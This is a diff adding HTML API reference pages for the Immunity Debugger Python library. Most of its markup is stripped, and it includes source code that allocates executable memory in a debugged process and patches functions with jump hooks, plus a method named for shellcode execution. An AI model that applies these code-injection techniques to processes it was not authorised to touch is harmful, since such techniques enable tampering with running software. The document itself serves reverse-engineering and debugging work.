2603 """
+
2604 Is the debugged process stopped?
+
2605
+
2606 @rtype: BOOL
+
2607 @return: Boolean (True/False)
+
2608 """
+
2609 return DebugerStatus [ "STOPPED" ] == self . getStatus ( )
+
2610
+
2612 """
+
2613 Is the debugged process in an event state?
+
2614
+
2615 @rtype: BOOL
+
2616 @return: Boolean (True/False)
+
2617 """
+
2618 return DebugerStatus [ "EVENT" ] == self . getStatus ( )
+
2619
+
2621 """
+
2622 Is the debugged process running?
+
2623
+
2624 @rtype: BOOL
+
2625 @return: Boolean (True/False)
+
2626 """
+
2627 return DebugerStatus [ "RUNNING" ] == self . getStatus ( )
+
2628
+
2630 """
+
2631 Is the debugged process finished?
+
2632
+
2633 @rtype: BOOL
+
2634 @return: Boolean (True/False)
+
2635 """
+
2636 return DebugerStatus [ "FINISHED" ] == self . getStatus ( )
+
2637
+
2639 """
+
2640 Is the debugged process closed?
+
2641
+
2642 @rtype: BOOL
+
2643 @return: Boolean (True/False)
+
2644 """
+
2645 return DebugerStatus [ "CLOSING" ] == self . getStatus ( )
+
2646
+2647
+2648
+2649
+2650
+
2652 """
+
2653 List of active hooks
+
2654
+
2655 @rtype: LIST
+
2656 @return: List of active hooks
+
2657 """
+
2658 return debugger . Listhook ( )
+
2659
+
2661 """Unhook from memory
+
2662 """
+
2663 debugger . Removehook ( hook_str )
+
2664
+2665
+2666
+2667 - def _getHookEntry ( self , entry ) :
+
2668 tbl = [ ]
+
2669
+
2670
+
2671 try :
+
2672 reg = HOOK_REG [ entry [ 0 ] ]
+
2673 tbl . append ( "MOV EAX, %s" % reg )
+
2674 except KeyError :
+
2675 if entry [ 0 ] == 'ESP' :
+
2676 tbl . append ( "LEA EAX, [ESP+0x14]" )
+
2677 elif type ( entry [ 0 ] ) == type ( 0 ) :
+
2678 tbl . append ( "MOV EAX, [0x%08x]" % entry [ 0 ] )
+
2679 else :
+
2680 return [ ]
+
2681
+
2682
+
2683 if len ( entry ) == 2 :
+
2684 tbl . append ( "MOV EAX, [EAX + 0x%x]" % entry [ 1 ] )
+
2685 tbl . append ( "STOSD" )
+
2686
+
2687 return tbl
+
2688
+2689
+2690
+2691
+2692 - def _createCodeforHook ( self , memAddress , afterHookAddr , ndx , table , execute_prelude , alloc_size ) :
+
2693
+
2694
+
2695
+
2696 alloc_stub = [ "PUSHAD" ]
+
2697 alloc_stub += [ "MOV EBX, 0x%08x" % memAddress ]
+
2698 alloc_stub += [ "MOV EDI, [EBX]" ]
+
2699 alloc_stub += [ "CMP DWORD DS:[EBX+4],1" ]
+
2700 alloc_stub += [ "JZ -C" ]
+
2701 alloc_stub += [ "MOV DWORD DS:[EBX+4],1" ]
+
2702 alloc_stub += [ "MOV EAX, EDI" ]
+
2703 alloc_stub += [ "SUB EAX, EBX" ]
+
2704 alloc_stub += [ "ADD EAX, 0x%08x" % ( len ( table ) * 4 + 4 ) ]
+
2705 alloc_stub += [ "CMP EAX, 0x%08x" % alloc_size ]
+
2706
+
2707 alloc_stub_reg = [ "MOV EAX, 0x%x" % ndx ]
+
2708 alloc_stub_reg += [ "STOSD" ]
+
2709 for entry in table :
+
2710 alloc_stub_reg += self . _getHookEntry ( entry )
+
2711 alloc_stub_reg += [ "MOV [EBX], EDI" ]
+
2712 alloc_stub_reg += [ "MOV DWORD DS:[EBX+4],0" ]
+
2713
+
2714 alloc_stub_pos = [ "POPAD" ]
+
2715
+
2716
+
2717 alloc_ret = "PUSH 0x%08x\nRET" % afterHookAddr
+
2718
+
2719 code = self . Assemble ( "\n" . join ( alloc_stub ) )
+
2720 reg_code = self . Assemble ( "\n" . join ( alloc_stub_reg ) )
+
2721 code += "\x0f\x83" + struct . pack ( "L" , len ( reg_code ) )
+
2722 code += reg_code
+
2723 code += self . Assemble ( "\n" . join ( alloc_stub_pos ) )
+
2724 code += execute_prelude
+
2725 code += self . Assemble ( alloc_ret )
+
2726
+
2727 return code
+
2728
+2729
+2731 CODE_HOOK_START = 8
+2732 flh = hook
+2733
+2734 table = flh . get ( )
+2735
+2736 memAddress = self . remoteVirtualAlloc ( alloc_size )
+2737 self . Log ( "Logging at 0x%08x" % memAddress )
+2738
+2739
+2740
+2741
+2742
+2743
+2744
+2745
+2746 ptr = memAddress + CODE_HOOK_START
+2747
+2748 fn_restore = [ ]
+2749
+2750 for fn_ndx in range ( 0 , len ( table ) ) :
+2751 hookAddress = table [ fn_ndx ] [ 0 ]
+2752 entry = table [ fn_ndx ] [ 1 ]
+2753
+2754 idx = 0
+2755
+2756 patch_code = self . Assemble ( "JMP 0x%08x" % ptr , address = hookAddress )
+2757
+2758 while idx < len ( patch_code ) :
+2759 op = self . Disasm ( hookAddress + idx )
+2760 if op . isCall ( ) or op . isJmp ( ) :
+2761 op = None
+2762 break
+2763
+2764 idx += op . getOpSize ( )
+2765 if not op :
+2766 continue
+2767
+2768
+2769 ex_prelude = self . readMemory ( hookAddress , idx )
+2770
+2771 code = self . _createCodeforHook ( memAddress , hookAddress + idx , \
+2772 fn_ndx + 1 , entry , ex_prelude , alloc_size )
+2773
+2774 self . writeMemory ( ptr , code )
+2775 ptr += len ( code )
+2776 self . writeMemory ( hookAddress , patch_code )
+2777
+2778 fn_restore . append ( ex_prelude )
+2779
+2780 if ptr % 4 :
+2781 ptr = 4 + ptr & ~ ( 4 - 1 )
+2782 hook . setMem ( ptr )
+2783 self . writeLong ( memAddress , ptr )
+2784
+2785 hook . setRestore ( fn_restore )
+2786
+2787
+2788
+2789
+2790
+2791 - def rVirtualAlloc ( self , lpAddress , dwSize , flAllocationType , flProtect ) :
+
2792 """
+
2793 Virtual Allocation on the Debugged Process
+
2794
+
2795 @type lpAddress: DWORD
+
2796 @param lpAddress: Desired starting Address
+
2797
+
2798 @type dwSize: DWORD
+
2799 @param dwSize: Size of the memory to be allocated (in bytes)
+
2800
+
2801 @type flAllocationType: DWORD
+
2802 @param flAllocationType: Type of Memory Allocation (MEM_COMMIT, MEM_RESERVED, MEM_RESET, etc)
+
2803
+
2804 @type flProtect: DWORD
+
2805 @param flProtect: Flag protection of the memory allocated
+
2806
+
2807 @rtype: DWORD
+
2808 @return: Address of the memory allocated
+
2809 """
+
2810 return debugger . pVirtualAllocEx ( lpAddress , dwSize , flAllocationType , flProtect )
+
2811
+2812
+2813 - def rVirtualFree ( self , lpAddress , dwSize = 0x0 , dwFreeType = 0x8000 ) :
+
2814 """
+
2815 Virtual Free of memory on the Debugged Process
+
2816
+
2817 @type size: DWORD
+
2818 @param size: (Optional, Def: 0) Size of the memory to free
+
2819
+
2820 @type dwFreeType: DWORD
+
2821 @param dwFreeType: (Optional, Def: MEM_RELEASE) Type of Free operation
+
2822
+
2823 @rtype: DWORD
+
2824 @return: On Successful, returns a non zero value
+
2825 """
+
2826 return debugger . pVirtualFreeEx ( lpAddress , dwSize , dwFreeType )
+
2827
+
2829 """
+
2830 Virtual Allocation on the Debugged Process
+
2831
+
2832 @type size: DWORD
+
2833 @param size: (Optional, Def: 0x10000) Size of the memory to allocated, in bytes
+
2834
+
2835 @rtype: DWORD
+
2836 @return: Address of the memory allocated
+
2837 """
+
2838
+
2839 return self . rVirtualAlloc ( 0x0 , size , 0x1000 , 0x40 )
+
2840
+2841
+
2843 return self . osversion
+
2844
+
2846 return self . osrelease
+
2847
+
2857
+
2859 """
+
2860 Return current debuggee thread id
+
2861
+
2862 @trype: LONG
+
2863 @return: Thread ID
+
2864 """
+
2865 return debugger . GetThreadId ( )
+
2866
+2867
+2868
+2869
+
2871 """
+
2872 Look up into our dictionaries to find a function match.
+
2873
+
2874 @type name: STRING
+
2875 @param name: Name of the function to search
+
2876
+
2877 @type module: STRING
+
2878 @param module: name of a module to restrict the search
+
2879
+
2880 @type version: STRING
+
2881 @param version: restrict the search to the given version
+
2882
+
2883 @type heuristic: INTEGER
+
2884 @param heuristic: heuristic threasold to consider a real function match
+
2885
+
2886 @type data: STRING|LIST
+
2887 @param data: Name (or list of names) of the .dat file inside the Data folder, where're stored the function
+
2888 patterns. Use an empty string to use all the files in the Data folder.
+
2889
+
2890 @rtype: DWORD|None
+
2891 @return: the address of the function or None if we can't find it
+
2892 """
+
2893 recon = FunctionRecognition ( self , data )
+
2894 return recon . searchFunctionByName ( name , heuristic , module , version )
+
2895
+
2897 """
+
2898 Search memory to find a function that fullfit the options.
+
2899
+
2900 @type csvline: STRING
+
2901 @param csvline: A line of a Data CSV file. This's a simple support for copy 'n paste from a CSV file.
+
2902
+
2903 @type heuristic: INTEGER
+
2904 @param heuristic: heuristic threasold to consider a real function match
+
2905
+
2906 @type module: STRING
+
2907 @param module: name of a module to restrict the search
+
2908
+
2909 @type data: STRING|LIST
+
2910 @param data: Name (or list of names) of the .dat file inside the Data folder, where're stored the function
+
2911 patterns. Use an empty string to use all the files in the Data folder.
+
2912
+
2913 @rtype: DWORD|None
+
2914 @return: the address of the function or None if we can't find it
+
2915 """
+
2916
+
2917 recon = FunctionRecognition ( self , data )
+
2918 return recon . searchFunctionByHeuristic ( csvline , heuristic , module )
+
2919
+
2921 """
+
2922 Look up into our dictionaries to find a function match.
+
2923
+
2924 @type address: DWORD
+
2925 @param address: Address of the function to search
+
2926
+
2927 @type heuristic: INTEGER
+
2928 @param heuristic: heuristic threasold to consider a real function match
+
2929
+
2930 @type data: STRING|LIST
+
2931 @param data: Name (or list of names) of the .dat file inside the Data folder, where're stored the function
+
2932 patterns. Use an empty string to use all the files in the Data folder.
+
2933
+
2934 @rtype: STRING
+
2935 @return: a STRING with the function's real name or the given address if there's no match
+
2936 """
+
2937 recon = FunctionRecognition ( self , data )
+
2938 return recon . resolvFunctionByAddress ( address , heuristic , data )
+
2939
+
2941 """
+
2942 @type address: DWORD
+
2943 @param address: address of the function to hash
+
2944
+
2945 @type compressed: Boolean
+
2946 @param compressed: return a compressed base64 representation or the raw data
+
2947
+
2948 @type followCalls: Boolean
+
2949 @param followCalls: follow the first call in a single basic block function
+
2950
+
2951 @type data: STRING|LIST
+
2952 @param data: Name (or list of names) of the .dat file inside the Data folder, where're stored the function
+
2953 patterns. Use an empty string to use all the files in the Data folder.
+
2954
+
2955 @rtype: LIST
+
2956 @return: the first element is described below and the second is the result of this same function but over the first
+
2957 call of a single basic block function (if applies), each element is like this:
+
2958 a base64 representation of the compressed version of each bb hash:
+
2959 [4 bytes BB(i) start][4 bytes BB(i) 1st edge][4 bytes BB(i) 2nd edge]
+
2960 0 <= i < BB count
+
2961 or the same but like a LIST with raw data.
+
2962 """
+
2963 recon = FunctionRecognition ( self , data )
+
2964 return FunctionRecognition . makeFunctionHashHeuristic ( address , compressed , followCalls )
+
2965
+
2967 """
+
2968 Return a SHA-1 hash of the function, taking the raw bytes as data.
+
2969
+
2970 @type address: DWORD
+
2971 @param address: address of the function to hash
+
2972
+
2973 @type data: STRING|LIST
+
2974 @param data: Name (or list of names) of the .dat file inside the Data folder, where're stored the function
+
2975 patterns. Use an empty string to use all the files in the Data folder.
+
2976
+
2977 @rtype: STRING
+
2978 @return: SHA-1 hash of the function
+
2979 """
+
2980
+
2981 recon = FunctionRecognition ( self , data )
+
2982 return recon . makeFunctionHashExact ( address )
+
2983
+
2985 """
+
2986 Return a list with the best BB to use for a search and the heuristic hash
+
2987 of the function. This two components are the function hash.
+
2988
+
2989 @type address: DWORD
+
2990 @param address: address of the function to hash
+
2991
+
2992 @type compressed: Boolean
+
2993 @param compressed: return a compressed base64 representation or the raw data
+
2994
+
2995 @type data: STRING|LIST
+
2996 @param data: Name (or list of names) of the .dat file inside the Data folder, where're stored the function
+
2997 patterns. Use an empty string to use all the files in the Data folder.
+
2998
+
2999 @rtype: LIST
+
3000 @return: 1st element is the generalized instructions to use with searchCommand
+
3001 2nd element is the heuristic function hash (makeFunctionHashHeuristic)
+
3002 3rd element is an exact hash of the function (makeFunctionHashExact)
+
3003 """
+
3004 recon = FunctionRecognition ( self , data )
+
3005 return recon . makeFunctionHash ( address , compressed )
+
3006
+3007
+3008
+3009
+
3011 """
+
3012 This function finds Natural Loops inside a function.
+
3013
+
3014 Each loop item has the following structure:
+
3015 [ start, end, nodes ]
+
3016 start: address of node receiving the back edge.
+
3017 end: address of node which has the back edge.
+
3018 node: list of node's addresses involved in this loop.
+
3019
+
3020 @type address: DWORD
+
3021 @param address: function start address
+
3022
+
3023 @rtype: LIST
+
3024 @return: A list of loops
+
3025 """
+
3026
+
3027 cfa = ControlFlowAnalysis ( self , address )
+
3028 return cfa . findNaturalLoops ( )
+
3029
+3030
+
3032 """
+
3033 timeout is in seconds. this function will sleep 1 second at a time until timeout is reached
+
3034 or the debugger has stopped (probably due to AV)
+
3035 returns True if we were stopped before timeout happened
+
3036 """
+
3037 for i in xrange ( timeout ) :
+
3038
+
3039 if self . isStopped ( ) :
+
3040 return True
+
3041 if self . isEvent ( ) :
+
3042 return True
+
3043
+
3044 time . sleep ( 1 )
+
3045 return False
+
3046
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.immlib.Debugger-class.html b/1.73/Documentation/Ref/Libs.immlib.Debugger-class.html
new file mode 100755
index 0000000..2b11bac
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.immlib.Debugger-class.html
@@ -0,0 +1,8110 @@
+
+
+
+
+ Libs.immlib.Debugger
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module immlib ::
+ Class Debugger
+
+
+
+
+
+
+
+
+Class Debugger source code
+
+
+
+
+
+
+
+
+
+ __init__ (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ getShellcodeExecutionNoMatterWhat (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ addKnowledge (self ,
+ id ,
+ object ,
+ force_add =0 )
+ source code
+
+
+
+
+
+
+
+ PYTHON OBJECT
+
+
+
+
+
+
+
+ TUPLE
+
+
+
+
+
+
+
+ LIST of TUPLES in the form of (DWORD, LIST OF STRING)
+
+
+
+ findPacker (self ,
+ name ,
+ OnMemory =True )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ cleanKnowledge (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ addGenHook (self ,
+ object )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ cleanHooks (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ cleanUP (self )
+ source code
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ STRING
+
+
+
+
+
+
+
+ opCode Object (Check libanalyze.py)
+
+
+
+
+
+
+
+
+
+
+
+ disasm (self ,
+ address ,
+ mode =5 )
+ source code
+
+
+
+
+
+
+
+ opCode Object (Check libanalyze.py)
+
+
+
+
+
+
+
+ opCode Object (Check libanalyze.py)
+
+
+
+
+
+
+
+ opCode Object (Check libanalyze.py)
+
+
+
+
+
+
+
+ opCode Object (Check libanalyze.py)
+
+
+
+
+
+
+
+ opCode Object (Check libanalyze.py)
+
+
+
+
+
+
+
+ opCode Object (Check libanalyze.py)
+
+
+
+
+
+
+
+ opCode Object (Check libanalyze.py)
+
+
+
+ disasmForward (self ,
+ address ,
+ nlines =1 ,
+ mode =5 )
+ source code
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+ opCode Object (Check libanalyze.py)
+
+
+
+
+
+
+
+ opCode Object (Check libanalyze.py)
+
+
+
+
+
+
+
+ opCode Object (Check libanalyze.py)
+
+
+
+
+
+
+
+ opCode Object (Check libanalyze.py)
+
+
+
+
+
+
+
+ opCode Object (Check libanalyze.py)
+
+
+
+
+
+
+
+ opCode Object (Check libanalyze.py)
+
+
+
+
+
+
+
+ opCode Object (Check libanalyze.py)
+
+
+
+ disasmBackward (self ,
+ address ,
+ nlines =1 ,
+ mode =5 )
+ source code
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+ opCode Object (Check libanalyze.py)
+
+
+
+
+
+
+
+ opCode Object (Check libanalyze.py)
+
+
+
+
+
+
+
+ opCode Object (Check libanalyze.py)
+
+
+
+
+
+
+
+ opCode Object (Check libanalyze.py)
+
+
+
+
+
+
+
+ opCode Object (Check libanalyze.py)
+
+
+
+
+
+
+
+ opCode Object (Check libanalyze.py)
+
+
+
+
+
+
+
+ Decode OBJECT
+
+
+
+ findDecode (self ,
+ address )
+ source code
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+ opCode Object (Check libanalyze.py)
+
+
+
+
+
+
+
+ STRING
+
+
+
+
+
+
+
+ STRING
+
+
+
+
+
+
+
+ STRING
+
+
+
+
+
+
+
+ TUPLES
+
+
+
+ getTraceArgs (self ,
+ address ,
+ tracedarg ,
+ shownonusersupplied =False )
+ source code
+
+
+
+
+
+
+
+ LIST
+
+
+
+
+
+
+
+ Function Object
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+ LIST
+
+
+
+
+
+
+
+ LIST
+
+
+
+
+
+
+
+ LIST
+
+
+
+
+
+
+
+ LIST
+
+
+
+
+
+
+
+ LIST
+
+
+
+
+
+
+
+ DICTIONARY
+
+
+
+
+
+
+
+ DICTIONARY
+
+
+
+
+
+
+
+ DICTIONARY
+
+
+
+ getRegsRepr (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ PEB OBJECT
+
+
+
+ getPEB (self )
+ source code
+
+
+
+
+
+
+
+ PHeap OBJECT
+
+
+
+
+
+
+
+ STRING
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+ INTEGER
+
+
+
+
+
+
+
+ TUPLE
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+ DICTIONARY
+
+
+
+
+
+
+
+
+
+
+
+ getModulebyAddress (self ,
+ address )
+ source code
+
+
+
+
+
+
+
+ Module OBJECT
+
+
+
+
+
+
+
+
+
+
+
+ _getmoduleinfo (self ,
+ base_address )
+ source code
+
+
+
+
+
+
+
+ LIST
+
+
+
+
+
+
+
+ LIST
+
+
+
+ Ps (self )
+ source code
+
+
+
+
+
+
+
+ LIST
+
+
+
+ ps (self )
+ source code
+
+
+
+
+
+
+
+ LIST
+
+
+
+
+
+
+
+ Event Object
+
+
+
+
+
+
+
+ Page OBJECT
+
+
+
+
+
+
+
+ LIST
+
+
+
+
+
+
+
+ LIST
+
+
+
+
+
+
+
+ Page OBJECT
+
+
+
+
+
+
+
+ DICTIONARY
+
+
+
+
+
+
+
+ Python List
+
+
+
+
+
+
+
+ DICTIONARY
+
+
+
+
+
+
+
+ LIST
+
+
+
+
+
+
+
+ DICTIONARY
+
+
+
+
+
+
+
+ DICTIONARY
+
+
+
+
+
+
+
+ LIST of Stack OBJECT
+
+
+
+
+
+
+
+ LIST of Call tuples
+
+
+
+
+
+
+
+ LIST
+
+
+
+
+
+
+
+ LIST of DWORD
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+ DWORD
+
+
+
+ getAddress (self ,
+ expression )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ Error (self ,
+ msg )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ clearStatusBar (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ logLines (self ,
+ data ,
+ address =0 ,
+ highlight =False ,
+ gray =False ,
+ focus =0 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ LogLines (self ,
+ data ,
+ address =0 ,
+ highlight =False ,
+ gray =False ,
+ focus =0 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ Log (self ,
+ msg ,
+ address =0 ,
+ highlight =False ,
+ gray =False ,
+ focus =0 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ log (self ,
+ msg ,
+ address =0 ,
+ highlight =False ,
+ gray =False ,
+ focus =0 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ updateLog (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ createLogWindow (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ setProgressBar (self ,
+ message ,
+ promille =100 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ closeProgressBar (self )
+ source code
+
+
+
+
+
+
+
+ STRING
+
+
+
+ getComment (self ,
+ address ,
+ type =253 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getUserComment (self ,
+ address )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getArgumentsComment (self ,
+ address )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getAnalyseComment (self ,
+ address )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getLibraryComment (self ,
+ address )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ markBegin (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ markEnd (self )
+ source code
+
+
+
+
+
+
+
+ DICTIONARY
+
+
+
+
+
+
+
+ DWORD
+
+
+
+ isvmWare (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ STRING
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ disableMemBreakpoint (self ,
+ addr )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ setHardwareBreakpoint (self ,
+ addr ,
+ type =1 ,
+ size =1 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ BUFFER
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+ String
+
+
+
+
+
+
+
+ Unicode String
+
+
+
+
+
+
+
+
+
+
+
+ readUntil (self ,
+ address ,
+ ending )
+ source code
+
+
+
+
+
+
+
+ Short Integer
+
+
+
+ readShort (self ,
+ address )
+ source code
+
+
+
+
+
+
+
+ List
+
+
+
+ searchShort (self ,
+ short ,
+ flag =None )
+ source code
+
+
+
+
+
+
+
+ List
+
+
+
+ searchLong (self ,
+ long ,
+ flag =None )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Search (self ,
+ buf ,
+ flag =None )
+ source code
+
+
+
+
+
+
+
+ List
+
+
+
+ searchCommands (self ,
+ cmd )
+ source code
+
+
+
+
+
+
+
+ List
+
+
+
+
+
+
+
+
+
+
+
+ Run (self ,
+ address =0 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ runTillRet (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ Pause (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ stepIn (self ,
+ address =0 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ quitDebugger (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Dettach (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ prepareForNewProcess (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ addHeader (self ,
+ address ,
+ header ,
+ color ='Black'
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ addLine (self ,
+ address ,
+ header ,
+ color ='Black'
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ comboBox (self ,
+ title ,
+ combolist )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ BOOL
+
+
+
+
+
+
+
+ BOOL
+
+
+
+
+
+
+
+ BOOL
+
+
+
+
+
+
+
+ BOOL
+
+
+
+
+
+
+
+ BOOL
+
+
+
+
+
+
+
+ LIST
+
+
+
+
+
+
+
+
+
+
+
+ removeHook (self ,
+ hook_str )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ _getHookEntry (self ,
+ entry )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ _createCodeforHook (self ,
+ memAddress ,
+ afterHookAddr ,
+ ndx ,
+ table ,
+ execute_prelude ,
+ alloc_size )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ addFastLogHook (self ,
+ hook ,
+ alloc_size =1048576 )
+ source code
+
+
+
+
+
+
+
+ DWORD
+
+
+
+ rVirtualAlloc (self ,
+ lpAddress ,
+ dwSize ,
+ flAllocationType ,
+ flProtect )
+ source code
+
+
+
+
+
+
+
+ DWORD
+
+
+
+ rVirtualFree (self ,
+ lpAddress ,
+ dwSize =0 ,
+ dwFreeType =32768 )
+ source code
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ TUPLE
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ DWORD|None
+
+
+
+ searchFunctionByName (self ,
+ name ,
+ heuristic =90 ,
+ module =None ,
+ version =None ,
+ data =''
+ source code
+
+
+
+
+
+
+
+ DWORD|None
+
+
+
+
+
+
+
+ STRING
+
+
+
+
+
+
+
+ LIST
+
+
+
+ makeFunctionHashHeuristic (self ,
+ address ,
+ compressed =False ,
+ followCalls =True ,
+ data =''
+ source code
+
+
+
+
+
+
+
+ STRING
+
+
+
+
+
+
+
+ LIST
+
+
+
+ makeFunctionHash (self ,
+ address ,
+ compressed =False ,
+ data =''
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ findLoops (self ,
+ address )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ addKnowledge (self ,
+ id ,
+ object ,
+ force_add =0 ) source code
+
+ This function add a python object to the knowledge database.
+
+ Parameters:
+
+ idobject
+
+
+
+
+
+
+ Gets python object from the knowledge database.
+
+ Parameters:
+
+ id Returns: PYTHON OBJECT
+ Object retrieved from the knowledge database
+
+
+
+
+
+
+
+ Gets the list of saved objects in the knowledge database.
+
+ Returns: TUPLE
+ List of String ids currently saved
+
+
+
+
+
+
+
+ findPacker (self ,
+ name ,
+ OnMemory =True ) source code
+
+ Find possible Packer/Cryptors/etc on a Module
+
+ Parameters:
+
+ nameOnMemory Returns: LIST of TUPLES in the form of (DWORD, LIST OF STRING)
+ A list of the Packer founded (Offset, List of Packer found in
+ that address)
+
+
+
+
+
+
+
+ Remove python object from knowledge database.
+
+ Parameters:
+
+ id
+
+
+
+
+
+
+ Gets PEB.
+
+ Returns: DWORD
+ PEB address
+
+
+
+
+
+
+
+ Analyse module's code
+
+ Parameters:
+
+ Address
+
+
+
+
+
+
+ Check if module is already analysed
+
+ Parameters:
+
+ Address Returns: DWORD
+ 1 if module already analysed
+
+
+
+
+
+
+
+ setVariable (self ,
+ address ,
+ string ) source code
+
+ Set Variable name to specified address.
+
+ Parameters:
+
+ AddressString
+
+
+
+
+
+
+ Get Variable name from specified address
+
+ Parameters:
+
+ Address Returns: STRING
+ Variable name for given address.
+
+
+
+
+
+
+
+ Disasm (self ,
+ address ,
+ mode =5 ) source code
+
+ Disasm address
+
+ Parameters:
+
+ AddressMode Returns: opCode Object (Check libanalyze.py)
+ Disassmbled Opcode
+
+
+
+
+
+
+
+ disasmSizeOnly (self ,
+ address ) source code
+
+ Determine command size only
+
+ Parameters:
+
+ Address Returns: opCode Object (Check libanalyze.py)
+ Disassmbled Opcode
+
+
+
+
+
+
+
+ Determine size and analysis data
+
+ Parameters:
+
+ Address Returns: opCode Object (Check libanalyze.py)
+ Disassmbled Opcode
+
+
+
+
+
+
+
+ Trace integer registers
+
+ Parameters:
+
+ Address Returns: opCode Object (Check libanalyze.py)
+ Disassmbled Opcode
+
+
+
+
+
+
+
+ Disassembly, no symbols/registers
+
+ Parameters:
+
+ Address Returns: opCode Object (Check libanalyze.py)
+ Disassmbled Opcode
+
+
+
+
+
+
+
+ Disassembly, registers undefined
+
+ Parameters:
+
+ Address Returns: opCode Object (Check libanalyze.py)
+ Disassmbled Opcode
+
+
+
+
+
+
+
+ Disassemble with run-trace registers
+
+ Parameters:
+
+ Address Returns: opCode Object (Check libanalyze.py)
+ Disassmbled Opcode
+
+
+
+
+
+
+
+ disasmForward (self ,
+ address ,
+ nlines =1 ,
+ mode =5 ) source code
+
+ Disasm nlines forward of given address
+
+ Parameters:
+
+ AddressnlinesMode Returns: opCode Object (Check libanalyze.py)
+ Disassmbled Opcode
+
+
+
+
+
+
+
+ disasmForwardAddressOnly (self ,
+ address ,
+ nlines =1 ) source code
+
+ Disasm nlines forward to the given address
+
+ Parameters:
+
+ AddressnlinesMode Returns: DWORD
+ Address of the opcode
+
+
+
+
+
+
+
+ disasmForwardSizeOnly (self ,
+ address ,
+ nlines =1 ) source code
+
+ Determine command size only
+
+ Parameters:
+
+ Addressnlines Returns: opCode Object (Check libanalyze.py)
+ Disassmbled Opcode
+
+
+
+
+
+
+
+ disasmForwardData (self ,
+ address ,
